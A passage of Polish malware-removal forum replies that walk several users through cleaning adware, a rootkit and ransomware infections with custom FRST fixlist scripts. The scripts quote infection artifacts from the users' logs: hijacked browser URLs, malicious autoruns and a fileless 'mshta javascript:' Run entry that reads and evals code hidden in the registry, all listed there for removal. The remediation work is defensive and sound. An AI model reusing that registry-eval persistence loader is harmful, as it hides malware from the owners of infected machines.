picasso

Instalator najnowszej Java wywalił starą i teraz w Internet Explorer jest już najnowsza wersja 66. Wszystko zrobione. Kończymy: 1. Zastosuj narzędzie Fix-it usuwające drobny błąd WMI: KLIK. 2. Usuń plik utworzony przez GMER C:\pxddypow.sys oraz samego GMERa z Pobranych. Następnie popraw jeszcze za pomocą DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Tak. Widzę, że coś zmienili, gdyż poprzednio ta strona deinstalatora nie reagowała na typ przeglądarki i mogłam ją otworzyć w Firefox bez żadnego komunikatu, pomimo że w ogóle nie mam zainstalowanej Javy.

Moja pierwsza akcja miała na celu tylko odblokować Windows, byś mógł w wygodny sposób skopiować ewentualnie niezaszyfrowane lub inne dane nie podlegające szyfrowaniu. Raport FRST zrobiony z poziomu środowiska RE jest zawężony tylko do tych elementów, które mogą blokować uruchamianie Windows. Było spodziewane, że syf jest znacznie grubszy. Twoje bieżące logi wskazują, że trzebaby było czyścić masę innych miejsc (zainfekowany katalog sieciowy Winsock, Harmonogram zadań, wszystkie przeglądarki zaatakowane adware). Jest to sprawa w ogóle nieopłacalna w kontekście masowo zaszyfrowanych danych, z którymi nic nie dałoby się zrobić. Czyli format. Zacznij od Recovery, choć nie mam pewności czy coś nie zostało naruszone.

Sprawdź czy coś się zmieni, jeśli ponowisz próbę skanu z poziomu Trybu awaryjnego Windows.

Czyli mam rozumieć, że MBAM nic nie wykrył? Jeśli nie, to na zakończenie: 1. Zastosuj narzędzie Fix-it usuwające drobny błąd WMI: KLIK. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Działania do przeprowadzenia: 1. Deinstalacje: - Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj zestaw aplikacji grupy "Pokki" preintegrowanych na Lenovo: Host App Service, Lenovo Web Start, Start Menu. Aplikacje marnej reputacji, na dodatek AdwCleaner usuwa ich niektóre komponenty i tu już jakby tego rodzaju naruszenia aplikacji Pokki są. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis Metric Collection SDK > Dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 ihpmServer; C:\Program Files (x86)\RayDld\ihpmServer.exe [270568 2015-10-12] () R2 WdMan; C:\ProgramData\2WdM2\WdMan.exe [333312 2015-12-04] (TFuns LIMITED) [brak podpisu cyfrowego] GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia ShortcutWithArgument: C:\Users\Public\Desktop\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yoursites123.com/?type=hp&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1446119365&z=eef90d1857cca95032e826cg7z1z2q4g9gbt0c7qcw&from=cornl&uid=st500lt012-1dg142_s3p8qxrlxxxxs3p8qxrl&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1446119365&z=eef90d1857cca95032e826cg7z1z2q4g9gbt0c7qcw&from=cornl&uid=st500lt012-1dg142_s3p8qxrlxxxxs3p8qxrl&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-3245305929-1233733730-577982597-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} HKU\S-1-5-21-3245305929-1233733730-577982597-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006 HKU\S-1-5-21-3245305929-1233733730-577982597-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.google.com/?trackid=sp-006 SearchScopes: HKLM -> DefaultScope - brak wartości SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-3245305929-1233733730-577982597-1001 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-3245305929-1233733730-577982597-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.yoursites123.com/web/?type=ds&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL&q={searchTerms} SearchScopes: HKU\S-1-5-21-3245305929-1233733730-577982597-1001 -> {B18D86E8-C087-4EDA-A209-26779F892B4E} URL = SearchScopes: HKU\S-1-5-21-3245305929-1233733730-577982597-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} BHO-x32: Brak nazwy -> {7a38e53c-e000-41e4-9b5a-47447db81c2b} -> Brak pliku BHO-x32: Middle Rush -> {d00ab4cc-662c-40b6-a85f-d53086f4bb16} -> C:\Program Files (x86)\Middle Rush\Extensions\d00ab4cc-662c-40b6-a85f-d53086f4bb16.dll => Brak pliku StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1446119171&z=91856e60aa0c12f5c9b2793g9z5zcqdgcg8b8t2e4t&from=cornl&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL CHR HomePage: Default -> hxxp://www.yoursites123.com/?type=hp&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL CHR StartupUrls: Default -> "hxxp://www.yoursites123.com/?type=hp&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL" CHR DefaultSearchURL: Default -> hxxp://www.yoursites123.com/web/?type=ds&ts=1449649012&z=2919d5da6cbe7b0c1b76befgbzczat1q4z8teebgao&from=ient07021&uid=ST500LT012-1DG142_S3P8QXRLXXXXS3P8QXRL&q={searchTerms} CHR DefaultSearchKeyword: Default -> yoursites123 CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx [2015-04-22] HKU\S-1-5-21-3245305929-1233733730-577982597-1001\...\RunOnce: [Application Restart #1] => C:\Users\Prezes\AppData\Local\Pokki\Engine\HostAppService.exe --disable-internal-flash --noerrdialogs --no-message-box --disable-extensions --disable-web-security --disable-web-resources --disable-cl (dane wartości zawierają 551 znaków więcej). Task: {2BC9D027-2FF2-41E9-B337-763E2AE2334F} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo) Task: {366A683E-7117-43DF-8BEF-AB0304B07EDA} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe Task: {BEA85B07-ABE4-44ED-8A18-2A979AB1CC6A} - System32\Tasks\SweetLabs App Platform => C:\Users\Prezes\AppData\Local\SweetLabs App Platform\Engine\ServiceHostAppUpdater.exe [2015-10-30] (Pokki) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\yoursites123Software Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f RemoveDirectory: C:\Program Files (x86)\RayDld RemoveDirectory: C:\ProgramData\2WdM2 RemoveDirectory: C:\ProgramData\lWdMl RemoveDirectory: C:\ProgramData\Pokki RemoveDirectory: C:\Users\Prezes\AppData\Local\SweetLabs App Platform RemoveDirectory: C:\Users\Prezes\AppData\Local\Mozilla RemoveDirectory: C:\Users\Prezes\AppData\Roaming\Mozilla C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\Users\Prezes\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Picexa.lnk C:\Users\Prezes\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Start Menu.lnk C:\Users\Prezes\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lenovo Web Start.lnk C:\Users\Prezes\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC App Store.lnk C:\Users\Prezes\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Menu.lnk C:\Users\Prezes\Downloads\sh-remover.exe C:\WINDOWS\SysWOW64\pl.html EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Google Chrome z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy yousites123 (o ile nadal będzie widoczny). 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Wszystko pomyślnie usunięte, problem powinien ustąpić. Jeszcze na wszelki wypadek zrób pełny skan za pomocą Malwarebytes Anti-Malware. Jeśli coś wykryje, przedstaw wynikowy log.

Wszystko się zgadza i tu nie nastąpiły żadne "niepożądane" zmiany, stan był taki od samego początku. W pierwszym poście podany log FRST Addition pokazuje, że miałaś zainstalowane Google Chrome 47.0.2526.73. Google Chrome nie obsługuje wtyczek NPAPI (czyli m.in. Java) już od wersji 42. Aspekt wtyczek rozpisany w przyklejonym temacie: KLIK. Cytując fragment: Architekturę wtyczek możemy podzielić na: ActiveX (Internet Explorer), NPAPI (Firefox i pochodne), PPAPI (Google Chrome, Opera i pochodne). Programy mające oznaczenie "NPAPI" na pomarańczowo nie są w ogóle obsługiwane przez Google Chrome i Microsoft Edge. Firefox: Powoli jest wycofywane wsparcie dla wtyczek NPAPI (m.in. Java i Silverlight), za wyjątkiem Adobe Flash. Brak obsługi w Firefox 32-bit zostanie wdrożony do końca roku 2016. A nowa edycja Firefox 64-bit jest pozbawiona tej obsługi out-of-box. NPAPI Plugins in Firefox Google Chrome 42 i nowsze: Jedyny obsługiwany typ wtyczek to PPAPI. Wtyczki NPAPI (m.in. Java i Silverlight) nie są już obsługiwane: od wersji 42 są domyślnie blokowane i niewidzialne na liście wtyczek, od wersji 45 kompletny brak obsługi. Treści wymagające wtyczek nie działają w Chrome Opera 24 i nowsze: Na chwilę obecną są jeszcze obsługiwane dwa typy wtyczek, tzn. PPAPI i NPAPI, ale długofalowa obsługa NPAPI jest pod znakiem zapytania. Microsoft Edge: Przeglądarka ma wbudowany z biegu Adobe Flash. Nie są obsługiwane żadne zewnętrzne wtyczki (m.in. Java i Silverlight). Java to tu była aktualizowana pod kątem Internet Explorer, bo to w nim siedziała. Klik w "Ten program jest zainstalowany poprawnie". I dostarcz raporty FRST.txt + Addition.txt.

Zrób log FRST z zaznaczonym Addition, ale z odznaczonym Shortcut.

SafeFinder to nie jest wirus tylko typ "adware/PUP". Typowe drogi nabycia tego rodzaju kwiatków: KLIK. Przypuszczalnie nabawiłeś się tego via "Asystent pobierania" dobrychprogramów, bo w Temp jest plik tego "Asystenta": C:\Users\Paweł\AppData\Local\Temp\ICReinstall_Realtek-High-Definition-Audio-Codecs-21164-dp.exe Problemem są modyfikacje Lightzap. Akcje do przeprowadzenia: 1. Odinstaluj starą niebezpieczną wersję Adobe Flash Player 14 ActiveX . 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Lightzap; C:\ProgramData\\Lightzap\\Lightzap.exe [437248 2015-12-18] () [brak podpisu cyfrowego] AppInit_DLLs: C:\ProgramData\Lightzap\Zoomtam.dll => C:\ProgramData\Lightzap\Zoomtam.dll [518656 2015-12-18] () AppInit_DLLs-x32: C:\ProgramData\Lightzap\GeoSansoft.dll => C:\ProgramData\Lightzap\GeoSansoft.dll [320512 2015-12-18] () Task: {5C95E724-6308-48B9-A80C-2F6D74457B3B} - System32\Tasks\DriverToolkit Autorun => D:\DriverToolkit\DriverToolkit.exe Task: C:\Windows\Tasks\DriverToolkit Autorun.job => D:\DriverToolkit\DriverToolkit.exe CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csoE-MCQAtPnNsPOyjOSjNqnQlOvbfUm2mpvNSBeOY_4506cR3yhu_Fi50vKx-xLCpodociNLTMd8MOomRiiaoxZ_lpnMdnRe924hkibimUqB8GEhxF7jEsVQ442liW-JJye4OeLHiJJyg,, CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csoE-MCQAtPnNsPOyjOSjNqnQlOvbfUm2mpvNSBeOY_4506cR3yhu_Fi50vKx-xLCpoR0yXqBzp9YNk4qDM0-FNNiV01-9kL_K_KLhwmJlUWHBn0U8nHWTB6Dq-fz66PTOfeeEM9Hedk6Q,,&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms} HKU\S-1-5-21-398703864-2259311769-2151984387-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-398703864-2259311769-2151984387-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-398703864-2259311769-2151984387-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://www.bing.com/search?q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKU\S-1-5-21-398703864-2259311769-2151984387-1000 -> DefaultScope {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-398703864-2259311769-2151984387-1000 -> {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms} DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Program Files (x86)\Temp RemoveDirectory: C:\ProgramData\Lightzap C:\Users\Paweł\Downloads\*-dp*.exe C:\Users\Paweł\Desktop\śmieci\ASGRAF EuroTEST 2014 PLUS.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Google Chrome z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Nie przedstawiłeś pliku fixlog.txt. Dopiero po jego pokazaniu akcje końcowe: 1. Usuń z Pulpitu folder Stare dane programu Firefox wygenerowany przez reset Firefox + pobrany FRST i jego logi z podfolderu na Pulpicie. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 2. Do czytania na co uważać, by ograniczyć podobne problemy: KLIK.

vs. Czy dobrze rozumiem, że zablokowałeś ten zakolorowany adres (właściwy) a nie te z artykułu (nie liczą się)? To stary artykuł sprzed kilku miesięcy, DNS Unlocker zmienia adresy IP. Nawiasem mówiąc to adresy DNS Unlocker są widoczne w raportach FRST użytkowników - zmodyfikowane serwery strony Windows (NameServer) a nie routera (DhcpNameServer). Przykładowy temat z forum: KLIK. Przypominam, że u Ciebie w logu nie ma oznak w/w infekcji. Są serwery strony Windows od Google, a serwery pobierane z routera od Orange. Przy czym serwery strony Windows biorą precedens nad tymi z routera i Twoje bieżące to adresy Google (widać to w FRST Addition). Tcpip\Parameters: [DhcpNameServer] 194.204.159.1 194.204.152.34 Tcpip\..\Interfaces\{9355CF30-DD5B-4C3D-B90B-55B655DFBD70}: [NameServer] 8.8.8.8,8.8.4.4 Tcpip\..\Interfaces\{9355CF30-DD5B-4C3D-B90B-55B655DFBD70}: [DhcpNameServer] 194.204.159.1 194.204.152.34 Problem jest w całej sieci, więc przyczyna leży poza Twoim komputerem. Jeszcze tak zapytam czy nie macie w tej sieci włączonego jakiegoś buforowania stron / proxy lub czegoś podobnego co ewentualnie ładowałoby stare zapamiętane dane przy problemach z rozwiązywaniem hosta?

Jeśli partycja Recovery nie była odkryta, to nie powinno być na niej ingerencji. Sytuacja jest tu jeszcze bardziej skomplikowana. Są tu aż dwie infekcje szyfrujące, tzn. także ślady CryptoWall 4.0: KLIK. W wielu katalogach masz zaszyfrowane pliki o zmienionych całkowicie nazwach, by się nawet nie dało rozpoznać jak wyglądał pierwotny plik: 2015-12-07 22:04 - 2015-12-07 22:04 - 10176120 _____ C:\Users\Bajor\Downloads\ap464emc8.0d3 2015-12-07 22:04 - 2015-12-07 22:04 - 10176104 _____ C:\Users\Bajor\Downloads\z03fjv.ub4 2015-12-07 22:04 - 2015-12-07 22:04 - 05366356 _____ C:\Users\Bajor\Downloads\v4a9x2m.mqfn2 2015-12-07 22:04 - 2015-12-07 22:04 - 05366356 _____ C:\Users\Bajor\Downloads\e0u9a5a.6t78 2015-12-07 22:04 - 2015-12-07 22:04 - 05366356 _____ C:\Users\Bajor\Downloads\bi9fzg7u6.bt7h4 2015-12-07 22:04 - 2015-12-07 22:04 - 03820488 _____ C:\Users\Bajor\Downloads\y9o08po.7f 2015-12-07 22:04 - 2015-12-07 22:04 - 03820472 _____ C:\Users\Bajor\Downloads\8jp3a754.3p 2015-12-07 22:04 - 2015-12-07 22:04 - 00594848 _____ C:\Users\Bajor\Downloads\k7zx2p.7pj2x 2015-12-07 22:04 - 2015-12-07 22:04 - 00195564 _____ C:\Users\Bajor\Downloads\qpicyw24d.br7 2015-12-07 22:04 - 2015-12-07 22:04 - 00081148 _____ C:\Users\Bajor\Downloads\34qwbo.n2b 2015-12-07 22:04 - 2015-12-07 22:04 - 00076060 _____ C:\Users\Bajor\Downloads\lj36w.wvu8 2015-12-07 22:04 - 2015-12-07 22:04 - 00057580 _____ C:\Users\Bajor\Downloads\1dwgacfr1.8rvyn 2015-12-07 22:04 - 2015-12-07 22:04 - 00039244 _____ C:\Users\Bajor\Downloads\a94i6j9r.59u6 2015-12-07 22:04 - 2015-12-07 22:04 - 00036108 _____ C:\Users\Bajor\Downloads\2gw585.fa8 2015-12-07 22:04 - 2015-12-07 22:04 - 00026380 _____ C:\Users\Bajor\Downloads\4p4t0q1.62 2015-12-07 22:04 - 2015-12-07 22:04 - 00024860 _____ C:\Users\Bajor\Downloads\4n444tas1.ke7cy 2015-12-07 22:04 - 2015-12-07 22:04 - 00019420 _____ C:\Users\Bajor\Downloads\8m9xo2u0n.79ywh .... i tak dalej .... Takie skomasowanie szyfrowania to wątpliwe, by był jakikolwiek ratunek. Pomijając już to nieszczęście, kupa infekcji w logu, w tym rootkit Necurs - to jego sterownik jest przypuszczalną przyczyną automatycznych resetów. Na początek spróbuj to wszystko usunąć i może będzie możliwe wejście do systemu, by w wygodny sposób przekopiować co ocalało i się do formatu przygotować: 1. W Notatniku przygotuj skrypt o następującej treści: testsigning: ==> Ustawiony "Tryb testu". Sprawdź obecność niepodpisanego sterownika S0 ae0a43e686b1a0d; C:\Windows\System32\Drivers\ae0a43e686b1a0d.sys [95672 2015-12-10] () S2 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe [68608 2015-10-18] () S3 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe [68608 2015-10-18] () S2 NetTcpHandler; C:\Users\Bajor\AppData\Roaming\NetService\netservice.exe [173088 2015-07-09] () S2 syshost32; C:\Windows\Installer\{B5AA6B37-C109-21AF-9EDE-37287EB853E1}\syshost.exe [207360 2015-12-10] (Accmeware Corporation) S2 Crashhd; C:\Users\Bajor\AppData\Local\Crsoft\crsvc.exe -st [X] S1 cherimoya; system32\drivers\cherimoya.sys [X] S3 cpuz134; \??\C:\Users\Bajor\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X] S3 dump_wmimmc; \??\D:\gry\CoD4\GameGuard\dump_wmimmc.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X] S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S2 limizeli; C:\Program Files (x86)\7224C90A-1434178811-DF11-905B-88AE1DE8E95F\knsz79BC.tmp [X] S2 lizebini; C:\Program Files (x86)\7224C90A-1434178811-DF11-905B-88AE1DE8E95F\knsbF72C.tmp [X] S2 Nero BackItUp Scheduler 4.0; C:\Program Files (x86)\Common Files\Nero\Nero BackItUp 4\NBService.exe [X] S1 ppfd_vt_1_10_0_24; system32\drivers\ppfd_vt_1_10_0_24.sys [X] S2 SSFK; C:\Program Files (x86)\SFK\SSFK.exe -s [X] S2 Update Air Globe; "C:\Program Files (x86)\Air Globe\updateAirGlobe.exe" [X] S2 WdsManPro; C:\ProgramData\FWdsManProF\WdsManPro.exe -service [X] S4 WMCoreService; Brak ImagePath S1 wsafd_1_10_0_19; system32\drivers\wsafd_1_10_0_19.sys [X] S1 wsfd_vt_1_10_0_20; system32\drivers\wsfd_vt_1_10_0_20.sys [X] S1 wwfd_vt_1_10_0_24; system32\drivers\wwfd_vt_1_10_0_24.sys [X] HKLM-x32\...\Run: [gmsd_pl_005010083] => [X] HKLM-x32\...\Run: [gmsd_pl_005010089] => [X] HKLM-x32\...\Run: [gmsd_pl_005010093] => "C:\Program Files (x86)\gmsd_pl_005010093\gmsd_pl_005010093.exe" HKLM-x32\...\Run: [gmsd_pl_005010095] => [X] HKLM-x32\...\Run: [gmsd_pl_005010099] => "C:\Program Files (x86)\gmsd_pl_005010099\gmsd_pl_005010099.exe" HKLM-x32\...\Run: [gmsd_pl_005010117] => [X] HKLM-x32\...\Run: [**2a6c2e20] => mshta javascript:X16jCvCiP="FZ";t1b=new%20ActiveXObject("WScript.Shell");gQ7sVpA="iI3";Dlz1u2=t1b.RegRead("HKLM\\software\\Wow6432Node\\c7b41d5991\\8c2cffaf");oclDUHKu4="bXvCr1V5Sc";eval(Dlz1u2);v9taE (dane wartości zawierają 15 znaków więcej). HKLM-x32\...\Run: [NetworkChecker] => C:\Users\Bajor\AppData\Local\Temp\KB00390954.exe [1122124 2015-10-18] (Mozilla Corpration) HKLM-x32\...\Run: [Malwarebytes' Anti-Malware (reboot)] => C:\Users\Bajor\AppData\Local\Temp\HBCD\Malwarebytes\mbam.exe [963976 2010-12-20] (Malwarebytes Corporation) HKLM\...\Policies\Explorer\Run: [445327342] => C:\ProgramData\mssgjs.exe [118786 2015-12-11] () HKLM\...\Policies\Explorer\Run: [1089096273] => C:\ProgramData\mszrkn.exe [160256 2015-06-15] () HKLM\...\Policies\Explorer\Run: [1645514027] => C:\ProgramData\msgxjrjl.exe [118786 2015-12-11] () HKLM\...\Policies\Explorer\Run: [1664083323] => C:\ProgramData\mstktkvji.exe [230912 2015-06-15] (Valion Group, LLC) HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 HKLM\...\Policies\Explorer: [HideSCAHealth] 1 HKU\Bajor\...\Run: [AdobeBridge] => [X] HKU\Bajor\...\Run: [Acronis] => C:\Users\Bajor\AppData\Roaming\uhxtv-a.exe HKU\Bajor\...\Run: [btpa9_24] => C:\Users\Bajor\AppData\Roaming\d3dx32gt\cmut9_26.exe [237568 2015-12-06] () HKU\Bajor\...\Run: [ChromeUpdServeisSystem] => C:\Users\Bajor\AppData\Roaming\ChromeUpdServeis\Microsoft_wanerevigo.exe [35328 2015-12-09] () HKU\Bajor\...\Run: [idfsoft] => C:\Users\Bajor\AppData\Local\Idfsoft\KB00324029.exe [163840 2015-12-06] (DVDVideoSoft Ltd.) HKU\Bajor\...\Run: [Ofics] => regsvr32.exe C:\Users\Bajor\AppData\Local\Ofics\dxsjycqn.dll HKU\Bajor\...\Run: [Ajworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Bajor\AppData\Local\Idfsoft\gxngydxx.dll HKU\Bajor\...\Run: [**2a6c2e20] => mshta 